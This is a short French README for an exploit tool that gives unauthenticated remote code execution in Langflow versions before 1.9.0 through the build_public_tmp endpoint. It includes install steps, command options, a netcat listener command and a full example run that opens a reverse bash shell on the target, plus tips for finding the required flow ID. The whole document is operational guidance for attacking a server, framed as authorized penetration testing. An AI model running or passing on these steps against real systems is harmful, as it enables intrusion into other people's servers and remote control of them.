
Exploit pour exécution de code à distance non authentifiée dans Langflow <1.9.0 via le point de terminaison build_public_tmp, fournissant un reverse shell pour les tests d'intrusion autorisés.
Exécution de code à distance pour Langflow via le point de terminaison build_public_tmp.
Exploitation via le point de terminaison Public Flow Build qui exécute un reverse shell sur la cible.
httpxInstallation :
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : URL de base de l'instance Langflow (par exemple, https://flow.example.com/)-l, --lhost : Votre adresse IP pour recevoir le reverse shell-p, --lport : Port d'écoute pour le reverse shell-f --flow-id : ID du flow cible (requis – obtenez-le depuis /api/v1/flows/ ou l'interface)-c --client-id : Valeur du cookie client_id pour l'identification de la sessionDémarrez un listener :
nc -nlvp 9001
Exécutez l'exploit :
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
En cas de succès, vous obtenez un shell bash interactif.
flow-id valide est requis. Listez tous les flows via GET /api/v1/flows ou copiez-le depuis l'URL du navigateur.MIT – pour la recherche en sécurité éducative et éthique.